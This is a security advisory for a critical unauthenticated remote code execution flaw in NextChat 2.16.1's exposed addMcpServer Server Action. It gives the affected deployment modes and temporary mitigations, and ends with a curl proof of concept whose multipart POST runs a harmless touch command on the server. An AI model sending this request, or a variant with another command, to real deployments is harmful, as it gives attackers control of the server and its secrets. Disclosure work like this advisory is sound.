### Vulnerability Overview **Title:** CVE Report: Unauthenticated Remote Code Execution via MCP Server Action in NextChat **Severity:** 9.8 (Critical) **Vulnerability Type:** Unauthenticated Remote Code Execution (Unauthenticated RCE) **Description:** A critical unauthenticated remote code execution vulnerability exists in NextChat (ChatGPT-Next-Web) version 2.16.1. The `addMcpServer` function in `app/mcp/actions.ts` is exposed as a Next.js Server Action without any authentication, authorization, or feature flag protection. An unauthenticated remote attacker can exploit this by sending a single HTTP POST request to the application root, leveraging attacker-controlled `command` and `args` parameters to spawn arbitrary child processes on the server with the privileges of the server process user. This allows the attacker to gain full server control, extract all API keys and secrets, access the file system, and perform lateral movement. ### Scope of Impact * **Affected Versions:** 2.16.1 (Confirmed), < 2.16.x (Potentially Affected) * **Affected Deployment Modes:** * Standalone mode (`yarn build + node server.js`) - **Affected** * Docker deployments - **Affected** * Vercel deployments - **Affected** (Server Actions are supported) * **Not Affected:** * Export/Static builds (`yarn export`) - **Not Affected** (Server Actions are disabled in static export mode) ### Remediation * **Official Fix:** The page does not provide specific official patches or updated versions. * **Temporary Mitigation Measures:** * Avoid deployment modes that support Server Actions, such as Standalone, Docker, or Vercel. * Deploy using static export mode (`yarn export`), as Server Actions are disabled in this mode. * Set `ENABLE_MCP=false` in environment variables (although the code contains an `isMcpEnabled()` guard function, the current exploitation path does not invoke this function, so this measure may be ineffective; wait for an official fix). ### POC Code ```bash curl -X POST http://localhost:3003/ \ -H "Accept: text/x-component" \ -H "Next-Action: bf121cc6f804134fe18832d4b2a952038b6c83" \ -H "Content-Type: multipart/form-data; boundary=----boundary" \ -d --raw $'------boundary\r\nContent-Disposition: form-data; name="__ACTION_ID_3F_3D121CC6F804134FE18832D4B2A952038B6C83"\r\n\r\n{"clientId":"touch","command":"touch","args":["/tmp/nextchat-rce-proof"],"status":"active"}\r\n------boundary--' ```